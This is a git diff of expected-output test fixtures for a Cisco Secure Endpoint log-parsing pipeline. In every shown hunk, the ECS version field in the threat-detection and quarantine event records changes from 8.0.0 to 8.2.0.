@@ -3425,7 +3425,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3498,7 +3498,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3588,7 +3588,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3682,7 +3682,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3783,7 +3783,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3880,7 +3880,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3966,7 +3966,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4056,7 +4056,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4159,7 +4159,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4252,7 +4252,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -4308,7 +4308,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -4373,7 +4373,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -4449,7 +4449,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -4525,7 +4525,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -4598,7 +4598,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", 
@@ -4678,7 +4678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -4758,7 +4758,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -4841,7 +4841,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4918,7 +4918,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5017,7 +5017,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5115,7 +5115,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -5191,7 +5191,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -5267,7 +5267,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -5339,7 +5339,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -5412,7 +5412,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -5492,7 +5492,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -5572,7 +5572,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -5659,7 +5659,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5735,7 +5735,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5811,7 +5811,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", 
@@ -5887,7 +5887,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -5963,7 +5963,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6039,7 +6039,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6115,7 +6115,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6191,7 +6191,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6267,7 +6267,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6343,7 +6343,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6419,7 +6419,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6495,7 +6495,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -6572,7 +6572,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -6671,7 +6671,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -6768,7 +6768,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -6853,7 +6853,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -6929,7 +6929,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -7005,7 +7005,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -7081,7 +7081,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", 
@@ -7154,7 +7154,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7244,7 +7244,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7334,7 +7334,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7424,7 +7424,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7514,7 +7514,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7604,7 +7604,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7694,7 +7694,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7784,7 +7784,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7874,7 +7874,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -7964,7 +7964,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -8058,7 +8058,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -8151,7 +8151,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json index 3f4bb69a948..6fc2b418ae4 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp5.log-expected.json 
@@ -38,7 +38,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -138,7 +138,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -214,7 +214,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -287,7 +287,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -377,7 +377,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -480,7 +480,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -578,7 +578,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -654,7 +654,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -727,7 +727,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -817,7 +817,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -906,7 +906,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -982,7 +982,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1058,7 +1058,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1134,7 +1134,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1206,7 +1206,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", 
@@ -1279,7 +1279,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1359,7 +1359,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1443,7 +1443,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1523,7 +1523,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1606,7 +1606,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1678,7 +1678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -1751,7 +1751,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1835,7 +1835,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1922,7 +1922,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1998,7 +1998,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2074,7 +2074,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2147,7 +2147,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2227,7 +2227,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2307,7 +2307,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2391,7 +2391,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", 
@@ -2590,7 +2590,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detection", @@ -2664,7 +2664,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2740,7 +2740,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2816,7 +2816,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2892,7 +2892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -2965,7 +2965,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3045,7 +3045,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3125,7 +3125,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3205,7 +3205,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3285,7 +3285,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3365,7 +3365,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3445,7 +3445,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -3528,7 +3528,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3601,7 +3601,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3691,7 +3691,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -3773,7 +3773,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3862,7 +3862,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3938,7 +3938,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4015,7 +4015,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4109,7 +4109,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -4185,7 +4185,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4261,7 +4261,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4334,7 +4334,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4420,7 +4420,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4506,7 +4506,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4592,7 +4592,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4678,7 +4678,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4764,7 +4764,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4850,7 +4850,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4936,7 +4936,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -5022,7 +5022,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -5107,7 +5107,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json index 682d5b8ce67..0652bffefcb 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json @@ -37,7 +37,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -113,7 +113,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -189,7 +189,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -265,7 +265,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -341,7 +341,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -417,7 +417,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -490,7 +490,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -580,7 +580,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -677,7 +677,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -763,7 +763,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -848,7 +848,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", 
@@ -920,7 +920,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -992,7 +992,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -1065,7 +1065,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1155,7 +1155,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1258,7 +1258,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1359,7 +1359,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1458,7 +1458,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1560,7 +1560,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1636,7 +1636,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine Attempt Failed", @@ -1708,7 +1708,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -1781,7 +1781,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1861,7 +1861,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -1941,7 +1941,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2031,7 +2031,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -2111,7 +2111,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", 
@@ -2184,7 +2184,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2268,7 +2268,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2351,7 +2351,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2424,7 +2424,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2518,7 +2518,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2613,7 +2613,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2703,7 +2703,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2802,7 +2802,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2892,7 +2892,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2977,7 +2977,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3049,7 +3049,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -3126,7 +3126,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3224,7 +3224,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Potential Dropper Infection", @@ -3292,7 +3292,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -3357,7 +3357,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3430,7 +3430,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", 
@@ -3516,7 +3516,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -3605,7 +3605,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3681,7 +3681,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3757,7 +3757,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3833,7 +3833,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3909,7 +3909,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -3986,7 +3986,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4083,7 +4083,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -4168,7 +4168,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -4244,7 +4244,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -4320,7 +4320,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json index 9ab2f15ee2c..474df773a06 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -37,7 +37,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", 
@@ -110,7 +110,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -196,7 +196,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -282,7 +282,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -372,7 +372,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -461,7 +461,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -537,7 +537,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -609,7 +609,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -682,7 +682,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -772,7 +772,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -852,7 +852,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -938,7 +938,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Cloud IOC", @@ -1017,7 +1017,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected in Low Prevalence Executable", @@ -1086,7 +1086,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -1146,7 +1146,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "File Fetch Completed", @@ -1234,7 +1234,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1332,7 +1332,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", 
@@ -1408,7 +1408,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -1485,7 +1485,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1584,7 +1584,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -1682,7 +1682,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", @@ -1749,7 +1749,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Policy Update", @@ -1814,7 +1814,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Executed malware", @@ -1896,7 +1896,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Multiple Infected Files", @@ -1974,7 +1974,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Quarantine", @@ -2047,7 +2047,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Retrospective Detection", @@ -2134,7 +2134,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2207,7 +2207,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2296,7 +2296,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2372,7 +2372,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2448,7 +2448,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Quarantine Failure", @@ -2521,7 +2521,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Detected", @@ -2606,7 +2606,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "Threat Quarantined", 
